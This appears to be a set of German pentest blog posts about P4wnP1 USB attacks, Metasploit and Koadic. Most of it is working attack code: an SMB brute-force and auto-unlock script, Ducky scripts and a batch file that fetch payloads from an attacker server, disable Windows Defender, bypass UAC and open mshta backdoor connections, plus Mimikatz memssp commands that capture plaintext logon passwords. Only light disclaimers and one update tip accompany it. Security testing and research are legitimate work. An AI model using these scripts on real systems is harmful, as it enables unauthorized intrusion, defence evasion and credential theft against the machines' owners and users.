Wer sich mit diesem Thema beschäftigt sollte wissen, wie man das Metasploit Framework für Penetrationstests einsetzt. In diesem Beispiel nutzen wir folgendes Auxiliary:

Viele der benötigten Optionen sind bereits mit Werten vorbelegt. Zusätzlich benötigen wir noch Dateien für die zu verwendenden Nutzernamen und Passwörter.  In unserem Beispiel sind das die Optionen USER_FILE und  PASS_FILE.

Passwortliste erstellen

Der zu verwendende Nutzername wird als Option im nachfolgenden Bash-Skript eingetragen. Für die Option PASS_FILE müssen wir im nächsten Schritt eine Liste mit möglichen Passwörtern erstellen. Sie können hier natürlich diverse Downloads aus dem Internet verwenden. Ich habe aber festgestellt, dass Anwender nicht besonders kreativ sind, wenn sie monatlich das Passwort ändern müssen. Hier wird z.B. gern eine Kombination aus Monatsnamen, Jahreszahl und einem Sonderzeichen gewählt. Hinter dem „Intelligence Wordlist Generator“ von zztor verbirgt sich ein Python Skript, mit dem Listen für verschiedene Passwort-Kombinationen erstellt werden können.

Haben Sie das Skript heruntergeladen, müssen Sie nur noch die Konfigurationsdatei Ihren Wünschen anpassen. Beachten Sie, das verschiedene Einstellungen natürlich unterschiedliche große Passwortdateien erzeugen. Für unser Vorhaben reicht folgende Konfiguration aus. Sie erzeugt eine Liste mit ca. 1500 Einträgen:

Wenden Sie das Skript wie folgt an:

python iwlgen.py -c config.cfg -o wordlist.txt

P4wnP1 A.L.O.A. einrichten

In diesem Beitrag würde es zu weit führen, alle Möglichkeiten des P4wnP1 hier vorzustellen. Eine gute Einführung zur Installation und Handhabung findet man auf der Github-Seite des Entwicklers mame82.

Einige Features der alten Ausführung wurden hier bereits vorgestellt. Die aktuelle Version hat mame82 A.L.O.A. (A Little Offensive Appliance) genannt. Das folgende Bash-Skript (lockpicker.sh) wurde für diese Modifikation geschrieben.

#!/bin/sh
# Title: Windows 10 Lockpicker with P4wnP1 A.L.O.A
# Author: Pentestit.de, Frank Neugebauer
# Version: 0.1 - 2019/06/13
#
# 1. Create a wordlist.txt with passwords to use
#    I recommend using "Intelligence Wordlist Generator (iwlgen)" for it. Get more information here:
#    https://github.com/zzztor/intelligence-wordlist-generator
# 2  You need Metasploit Framework to run auxiliary/scanner/smb/smb_login.
#    It is preinstalled on your P4wnP1 A.L.O.A.
# 3. Make your settings in the section below.
# 4. Run lockpicker.sh script from Wordlist directory or use P4wnP1 Webinterface to create
#    TriggerAction: Enabled, One Shot, Trigger: DHCP leased issued, Action: run a Bash script: lockpicker.sh
#
# LED is permanently on = password found and stored in WORDLIST_DIR
# LED is blinking three times = no password found
#------------------------------------------------------------------------------------------------------------
# Make your settings here
TARGET_IP="172.16.0.2"
KEYBOARD_LAYOUT="GE"
WORDLIST_DIR="/usr/local/P4wnP1/scripts/iwlgen"
USERNAME="frank"


#Turn LED off
P4wnP1_cli led -b 0  >/dev/null

# Setup default gw on RDNIS interface
P4wnP1_cli net set server -i usbeth -a 172.16.0.1 -m 255.255.255.252 -o "3:172.16.0.1" -o "6:" -r "172.16.0.2|172.16.0.2|5m" >/dev/null
sleep 5

# Create a userlist.txt according to your settings
cd $WORDLIST_DIR
echo "${USERNAME}" >  userlist.txt

# Delete old passwords.txt
testfile="$WORDLIST_DIR/password.txt"
if [ -f "$testfile" ];then
      rm $WORDLIST_DIR/password.txt
fi

# Check if wordlist.txt exists in current directory
testfile="$WORDLIST_DIR/wordlist.txt"
if  ! [ -f "$testfile" ];then
      echo "No wordlist found. Create a list with passwords and copy it to ${WORDLIST_DIR}."
      exit
fi

echo "Wait until the password for user $USERNAME  is found ..."

# Run Metasploit Console
msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set STOP_ON_SUCCESS true; set RHOSTS $TARGET_IP; set USER_FILE $WORDLIST_DIR/userlist.txt; set PASS_FILE $WORDLIST_DIR/wordlist.txt; run; exit" > result.txt

grep "Success" result.txt | cut -d: -f5 | sed 's/.$//' > password.txt

# Delete empty file (password.txt)
if ! [ -s password.txt ];
then
  rm password.txt
fi

# Check if password is found
testfile="$WORDLIST_DIR/password.txt"
if [ -f "$testfile" ];then
      echo "Password found for user ${USERNAME} : `cat password.txt`"
      echo "`cat password.txt`" >>  $WORDLIST_DIR/recent_passwords.txt
      P4wnP1_cli led -b 255 >/dev/null # LED is permanantly on
   else
      echo "No password found!"
      P4wnP1_cli led -b 3 >/dev/null   # LED is blinking three times 
      exit
fi

# Create HID-Script and run it
password=`cat password.txt`
echo "layout(\"${KEYBOARD_LAYOUT}\")" > /usr/local/P4wnP1/HIDScripts/lockpicker.js
echo "press(\"ESC\")" >>/usr/local/P4wnP1/HIDScripts/lockpicker.js
echo "delay(1000)" >>/usr/local/P4wnP1/HIDScripts/lockpicker.js
echo "type(\"${password}\")" >> /usr/local/P4wnP1/HIDScripts/lockpicker.js
echo "press(\"ENTER\")" >>/usr/local/P4wnP1/HIDScripts/lockpicker.js

P4wnP1_cli hid run -n lockpicker.js >/dev/null

Sie müssen nur noch die Anpassungen im ersten Teil des Skriptes vornehmen und es dann im Verzeichnis /usr/local/P4wnP1/scripts auf dem P4wnP1 abspeichern. Auch die dazugehörige Liste mit den zu verwendeten Passwörtern sollte sich im passenden Verzeichnis (siehe Skript) befinden.

Sie haben nun folgende Möglichkeiten den SMB-Brute-Force-Angriff auszuführen:

Nutzen Sie ssh und führen von dort das Skript lockpicker.sh aus oder erstellen Sie (siehe Video) eine TriggerAction, die automatisch beim Einstecken des P4wnP1 im Zielsystem ausgeführt wird.

Gefundene Passwörter sind in der Datei recent_passwords.txt auf dem P4wnP1 gespeichert.

Das nachfolgende Video zeigt die grundsätzliche Vorgehensweise:

Der Beitrag SMB brute force mit P4wnP1 A.L.O.A. – Das Universalwerkzeug erschien zuerst auf .

Das in LibreOffice enthaltene Skript pydoc.py enthält die Funktion tempfilepager, die Argumente an os.system übergibt, wodurch die Remote Code Execution ermöglicht wird.

Im folgenden Beitrag erläutere ich, wie Sie den Exploit nutzen können.

In einem ersten Schritt muss ein Office-Dokument erstellt werden, dass den Schadcode enthält. Im Metasploit-Framework wird dies mit wenigen Befehlen erledigt:

Das LibreOffice Dokument librefile.odt wird in diesem Fall im Verzeichnis /root/.msf4/local abgelegt.

Nachdem das Dokument an das Zielsystem ausgeliefert wurde, muss noch eine Handler eingerichtet werden, der die eigehenden Daten in Kali Linux empfängt und die Meterpreter-Session erzeugt. Da es sich um einen Windows-Exploit handelt, ist hier auch der entsprechende Payload, in diesem Beispiel windows/meterpreter/reverse_tcp, zu wählen.

Öffnet das Opfer die hinterlegte Datei, werden eine oder mehrere Meterpreter-Sessions aktiv:

Das nachfolgende Video zeigt, wie durch Bewegen der Maus das entsprechende Python-Skript ausgeführt wird.

Gegenmaßnahmen:

Aktualisieren Sie LibreOffice auf die Versionen ab 6.0.7 bzw. 6.1.3.

Der Beitrag LibreOffice Remote Code Execution mit Metasploit erschien zuerst auf .

Im Folgenden zeige ich, wie Sie mit Hilfe des Post-Exploitation-Frameworks Koadic, dem P4wnP1 und der neunen Version von Mimikatz, das Logon-Passwort in Klartext aus Windows 10 (1809) auslesen können und damit eine flexible Hintertür zum Zielsystem nutzen.

Das Szenario

Das Zielsystem hat Windows 10 installiert, verfügt über alle aktuellen Updates und ist mit dem Windows Defender vor aktuellen Angriffen geschützt. Auf dem PC ist ein Nutzer eingerichtet, der mit Hilfe der Benutzerkontensteuerung (UAC) bei Bedarf lokale administrative Rechte erhalten kann.

Der Angreifer hat eine WLAN-Verbindung zum P4wnP1 und unterhält gleichzeitig eine SSH-Verbindung zu einem externen Server, auf dem das Post-Exploitation-Framework Koadic installiert ist.

Die Herausforderung

Zum Auslesen des Passwortes sind in der Regel administrative Rechte erforderlich. Um dies zu erreichen, können wir verschiedene Koadic-Module einsetzen, die im Allgemeinen aber vom Windows Defender erkannt und damit geblockt werden. Auch für Mimikatz hat der Windows Defender eine Signatur parat, die den erfolgreichen Einsatz unmöglich macht.

Die Lösung

Mit Hilfe des P4wnPi, der über USB mit dem Opfer-PC verbunden ist, kann der Angreifer eine  SSH-Verbindung über WLAN zum P4wnP1 herstellen. Die Hintertür-Funktionalität des P4wnPi nutzend kann er nun verschieden Ducky-Skripte starten, die zunächst den Windows Defender auf dem Zielsystem abschalten und danach eine „Zombie“-Verbindung zum Koadic-Server herstellen. Über diese Schnittstelle lassen ich nun weitere Post-Exploitation-Module ausführen, die weitere Informationen (z.B. Passwort-Hashes) aus dem Zielsystem auslesen, permanente Verbindungen herstellen oder das Zielnetzwerk erkunden.  

Um das Logon-Passwort auf dem Zielsystem im Klartext zu erhalten, wird die neue Version von Mimikatz übertragen, ausgeführt und danach der Bildschirm gesperrt. Beim nächsten Login des Nutzers wird das Passwort in Klartext in eine Logdatei geschrieben, die nur noch vom Angreifer ausgelesen werden muss.

Koadic-Server einrichten

Koadic ist eine Post-Exploitation-Rootkit, das vorrangig auf Windows spezialisiert ist. Als Programmiersprache wird Python3 eingesetzt. Die Anwendungen laufen in der Regel über Module (hier „stager“ und „implants“ genannt), die in JScript/VBScript geschrieben sind. Sie installieren die Software wie folgt:

sudo apt-get update
sudo apt-get install build-essential libssl-dev libffi-dev python-dev python3-pip
cd /opt/
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip3 install -r requirements.txt
./koadic

Die Datei autorun.example enthält ein Beispiel, wie Sie bereits beim Programmstart gewisse Parameter übergeben, die von Koadic genutzt werden sollen. Hier bieten sich folgende Optionen an:

ENDPOINT: standartmäßig legt Koadic einen zufälligen Endpunkt fest für die URL fest. Hiermit wir eine gleichbleibende Zeichenkette vorgemerkt.
SRVPORT: legt den Port fest, auf dem der Server „horcht“.
KEYPATH/CERTPATH : verweisen auf die notwendigen Dateien für die Verschlüsselung.

Beispieldatei autorun.cfg:

set SRVPORT 443
set ENDPOINT eagle  
#set KEYPATH /opt/koadic/x509/server.key
#set CERTPATH /opt/koadic/x509/server.crt
run

Der Programmaufruf mit diesen Parametern sieht dann wie folgt aus:

sudo su
cd /opt/koadic/
./koadic --autorun autorun.cfg

Der erfolgreiche Start des Koadic-Servers (ohne Verschlüsselung) sieht folgendermaßen aus:

Den P4wnP1 einrichten

Die Installation des P4wnP1 habe ich in diesem Beitrag ausführlich erklärt. Beachten Sie außerdem, dass für die Hintertür die Option „hid_backdoor.txt“ in der Datei setup.cfg freizuschalten ist. Diese und weitere Beschreibungen, z.B. zur Nutzung von Ducky Skripten,  finden Sie in meinem vorangegangen Artikel.

Folgende Ducky-Skripte müssen Sie für das Szenario erstellen und auf den P4wnP1 in das Verzeichnis /P4wnP1/DuckyScripts abspeichern:

Disable_Defender.duck

//    Act responsibly!
//
//    Pentestit.de (2019)
//    Copy defender.bat from Koadic-Server and run it as setup.bat on Target PC
//    setup.bat will disable Windows Defender and install first Zombie
//
DELAY 2000
GUI r
DELAY 1000
STRING cmd /C "start /MIN powershell iwr -Uri http://koadic_server-IP/defender.bat -OutFile c:\windows\temp\setup.bat" 
DELAY 2000
ENTER
DELAY 8000
GUI r
DELAY 1000
STRING cmd /C "start /MIN c:\windows\temp\setup.bat"
DELAY 2000
ENTER
DELAY 4000
ALT J
DELAY 4000
GUI r
DELAY 1000
STRING cmd /C "start /MIN taskkill /f /IM cmd.exe"
DELAY 6000
ENTER
DELAY 6000

Get_Zombie.duck

//    Act responsibly!
//
//    Pentestit.de (2019)
//    Get a Koadic "Zombie"
//
DELAY 2000
GUI r
DELAY 1000
STRING cmd /C "start /MIN mshta http://koadic_server-IP:443/endpoint"
DELAY 2000
ENTER

Run_Mimikatz.duck

//    Act responsibly!
//
//    Pentestit.de (2019)
//    Download mimikatz.exe from Koadic-Server und run it on Target PC
//    Log screen and wait for the next user who unlocks it
//
DELAY 2000
GUI r
DELAY 200
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 4000
TAB
TAB
ENTER
DELAY 3000
STRING $down = New-Object System.Net.WebClient; $url = 'http://koadic_server-IP/mimikatz/mimikatz.exe'; $file = 'mimikatz.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file);
ENTER
DELAY 3000
STRING privilege::debug
ENTER
DELAY 3000
STRING misc::memssp
ENTER
DELAY 2000
REM Close all windows
STRING exit
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 1000
REM Lock Screen
GUI l

Wie Sie bereits bemerkt haben, wird im ersten Ducky Script (Disable_Defender.duck) die Datei defender.bat vom Koadic-Server heruntergeladen und als setup.bat in einem temporären Verzeichnis auf dem Opfer-PC abgelegt.

Betrachtet man diese Datei, so wird der eine oder andere die Möglichkeit einer Vereinfachung sehen. Hier sollten keine Missverständnisse aufkommen. Mir ist auch klar, dass eine großer Teil des Skriptes durch den Powershell-Befehl: Start-Process powershell -Verb runAs abgedeckt werden könnte. In diesem Zusammenhang wollte ich aber eine Alternative aufzeigen, die die Benutzerkontensteuerung aufruft. Dazu angeregt wurde ich über diesen Post im Hak5-Forum. Die alternative Powershell-Methode hatte ich bereits hier beschrieben.

Die Datei defender.bat sieht somit folgendermaßen aus:

REM Act responsibly!
REM Pentestit.de (2019)
REM -------------------------------------
REM Get admin and disable Windows Defender
REM Get Koadic Zombie
REM Thanks to Hak5-Forum https://forums.hak5.org/topic/31147-key-combos-in-ducky-script/

@echo off
CLS

mode con:cols=18 lines=1

:checkPrivileges
NET FILE 1>NUL 2>NUL
if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )

:getPrivileges
if '%1'=='ELEV' (shift & goto gotPrivileges)

setlocal DisableDelayedExpansion
set "batchPath=%~0"
setlocal EnableDelayedExpansion
ECHO Set UAC = CreateObject^("Shell.Application"^) > "%temp%\OEgetPrivileges.vbs"
ECHO UAC.ShellExecute "!batchPath!", "ELEV", "", "runas", 1 >> "%temp%\OEgetPrivileges.vbs"
"%temp%\OEgetPrivileges.vbs"
exit /B

:gotPrivileges
::::::::::::::::::::::::::::
:START
::::::::::::::::::::::::::::
setlocal & pushd .

REM Run shell as admin (example) - put here code as you like
REM cmd /k
powershell  "Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -DisableIOAVProtection $true -DisableIn$
REM Wait 5 seconds
timeout 5 > NUL
REM Start Zombie
mshta http://koadic_server-IP:443/eagle

Hinweis für die Skript-Erstellung

Wer schon selbst Ducky Skripte erstellt hat wird festgestellt haben, dass sie nicht beim ersten mal funktionieren bzw. ein wenig Kleinarbeit (Tweaking) gefragt ist. Oftmals können schon kleine Veränderungen in der Wartezeit (Delay-Kommando) den gewünschten Erfolg bringen. Folgender Tipp hilft, zwischen einer laufenden Hintertür-Session und der P4wnP1-Kommandozeile hin und her zu schalten:

Die Tastenkombination STRG +AD schaltet auf die Kommandozeile zurück. Hier können Sie nun mit den Editor Ihrer Wahl das Ducky-Skript bearbeiten/erstellen.

Um die Wirkung des Skripts auf de Zielsystem mittels der Funktion SendDuckyScript zu testen, schalten Sie mit dem Befehl sudo screen -d -r wieder in den ursprünglichen Backdoor-Modus zurück:

Vorgehensweise im Einzelnen

Wir gehen davon aus, dass der Koadic-Server gestartet ist und er Anfragen aus dem Internet über den festgelegten Port und URL (Endpoint) empfangen kann.

Gleichzeitig liegen im Download Verzeichnis des Webservers die Dateien mimikatz.exe und defender.bat. Beachten Sie, dass je nach Architektur des Zielsystem (32- oder 64-bit) verschiedene Mimikatz-Dateien zur Anwendung kommen können.

Kurz nachdem der P4wnP1 in eine freie USB-Schnittstelle des Zielsystems gesteckt wurde, können Sie vom Angriffssystem eine SSH-Verbindung zum P4wnP1 herstellen. Nutzen Sie dazu die WLAN-Einstellungen und Passworte wie hier bereits beschrieben.

Sobald eine Verbindung zum P4wnP1 hergestellt ist, sollten Sie die Tastatureinstellungen auf dem Zielsystem prüfen und ggf. anpassen. Nutzen Sie dazu den Befehl SetKeyboardLanguage.

Danach können Sie den Windows Defender mittels Ducky Skript Disable_Defender.duck abschalten. Gleichzeitig wird eine Session zum Koadic-Server erzeugt.  Nun sollte auch die ersten „Zombie-Verbindung“ im Server dargestellt sein.

Sollte aus verschiedenen Gründen die Verbindung zum Koadic-Server unterbrochen werden, so nutzen Sie das Ducky Skript Get_Zombie.duck. Verwenden Sie dazu das Kommando SendDuckyScript im Menü des P4wnP1. Die Art und Weise hatte ich hier bereits beschrieben. Außerdem ist zu beachten, dass Sie nach erfolgreicher Ausführung des entsprechenden Skriptes „nur“ Nutzerrechte besitzen. Sie müssen also die Rechte eskalieren, wenn es erforderlich ist. In meinen Tests funktioniert dies, wie hier gezeigt,  unter Windows 10 mit folgenden Modulen: /implant/elevate/bypassuac_compdefaults oder /implant/elevate/bypassuac_fodhelper.

Um an das Logon Passwort zu gelangen, kommt Run_Mimikatz.duck zum Einsatz. Auch hier benötigen Sie wieder administrative Rechte, die das Skript eskaliert. Abschließend sperrt das Ducky Skript den Bildschirm, sodass sich der Nutzer neu einloggen muss.  Erst danach können Sie das Passwort aus der Datei c:\windows\system32\mimilsa.log im Klartext auslesen. Verwenden Sie dazu eine aktive Zombie-Verbindung und nutzen Sie  das Kommando cmdshell und dann die entsprechenden Befehle aus dem Windows-Betriebssystem.

cmdshell (Zombie-ID)
type c:\windows\system32\mimilsa.log

Das folgende Video zeigt den gesamten Ablauf des Angriffs:

Fazit

Wird der P4wnP1 über das eingebaute Hintertür-Modul einsetzt, so kann man über das Kommando FireStage1 eine Verbindung zum Zielsystem herstellen. Dabei helfen die beigefügten Befehle, um Informationen zu sammeln bzw. auszuwerten. Die hier vorgestellte Methode über den Koadic-Server stellt eine Alternative dar, die außerdem die Vorteile eines Post Exploitation Frameworks anschaulich macht.

Der Beitrag Die flexible Hintertür mit Koadic und P4wnP1 erschien zuerst auf .

Um zu zeigen, wie Sie Ducky Skripte mit Hilfe des P4wnP1 anwenden, werden wir in diesem Szenario den Windows Defender in Windows 10 auf dem Zielsystem abschalten. Nachdem Sie weitere Test durchgeführt haben, kann der Schutz mit einem weiteren Skript wieder eingeschaltet werden.

Für unsere Vorhaben benötigen wir zwei Ducky Skripte, die auf dem P4wnP1 platziert werden müssen. Für diese Zwecke steht das Verzeichnis P4wnP1/DuckyScripts/ bereit. Ähnliche Skripte habe ich für einen früheren Beitrag geschrieben. Wie müssen sie nur noch für den P4wnP1 einpassen.

In diesem Szenario nutzen wir die WLAN-Funktionalität des P4wnP1 aus. Der Penetration Tester muss sich also nicht unmittelbar am Zielsystem befinden, sondern kann seine Testumgebung in (WLAN)-Reichweite platzieren. Von hier kann er dann den P4wnP1 fernsteuern bzw. die notwendigen Skripte starten.

Ducky Skripte erstellen

Die Ducky-Skripte könnten wie folgt aussehen:

Disable_Defender.duck

// Turn off Windows Defender Windows 10 1803
// Author: Pentestit.de 20/02/2019
// You take responsibility for any laws you break with this,
// I simply point out the security flaw
//

DELAY 2000
GUI r
DELAY 1000
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 4000
ALT J
DELAY 4000
STRING Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true -DisableBlockAtFirstSeen $true -DisableBehaviorMonitoring $true -MAPSReporting 0
ENTER
DELAY 3000
STRING Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1
ENTER
DELAY 1000
STRING exit
ENTER

Enable_Defender.duck

// Turn on  Windows Defender Windows 10 1803
// Author: Pentestit.de 09/02/2019
// You take responsibility for any laws you break with this,
// I simply point out the security flaw
//

DELAY 2000
GUI r
DELAY 1000
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 4000
ALT J
DELAY 2000
STRING Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 0
ENTER
DELAY 1000
STRING exit
ENTER

// Reboot target after execution 
ALT F4
ENTER

Bei meinen Tests ist aufgefallen, dass die Zielsysteme je nach Hardware verschieden reagieren. Bei älteren Systemen mit geringerer Leistungsfähigkeit, sollten Sie die Verzögerungen (DELAY) zwischen den einzelnen Befehlen entsprechend hoch wählen. Hier macht es Sinn vor dem Einsatz ein wenig mit der Hardware der Zielsysteme zu experimentieren.

Der Angriff

Um die Skripte nun einzusetzen reicht es aus, sie ins entsprechende Verzeichnis zu kopieren. Der Rest wird vom P4wnP1 übernommen.  Im ersten Teil habe ich gezeigt, wie Sie die Konfiguration des P4wnP1 verändern können. Öffnen Sie dazu die Datei setup.cfg und kommentieren Sie im Bereich „Payload selection“ die Zeile „PAYLOAD=hid_backdoor.txt“ aus. Vergessen Sie nicht die Zeile „PAYLOAD=network_only.txt“ wieder zu kommentieren.

Nach einem Neustart des P4wnP1 wird Ihnen nun folgendes Menü angezeigt:

Der help-Befehl zeigt die verfügbaren Kommandos an. Für unser Beispiel muss nun noch das Tastaturlayout des Zielsystems mittels SetKeyboardLanguage eingestellt werden. Als Standard ist hier us vorgesehen. Ist eine deutschen Tastatur auf dem Zielsystem vorhanden, so müssen Sie hier den Wert 15 auswählen.

Die vorhandenen Ducky Skripte machen Sie mit dem Befehl SendDuckyScript sichtbar und wählen dann die Nummer des gewünschten Skriptes aus. In unserem Beispiel finden das Skript zum Abschalten unter dem Menüeintrag 6.

Nach einer kurzen Wartezeit wird das Skript auf dem Zielsystem ausgeführt. Hier wird zunächst ein Powershell-Fenster mit administrativen Rechten geöffnet. Danach ermöglichen zusätzliche Registry-Einträge, das Abschalten des Windows Defenders.  

Gehen Sie analog dazu vor, um den Defender nach erfolgreichem Test wieder einzuschalten. Beachten Sie, dass der komplette Schutz nach Aufrufen des Skripts erst nach Neustart des Zielsystems wiederhergestellt wird.

Da nachfolgende Video zeigt die Vorgehensweise:

Der Beitrag P4wnP1- die USB Angriffsplattform mit Potential (Teil2) erschien zuerst auf .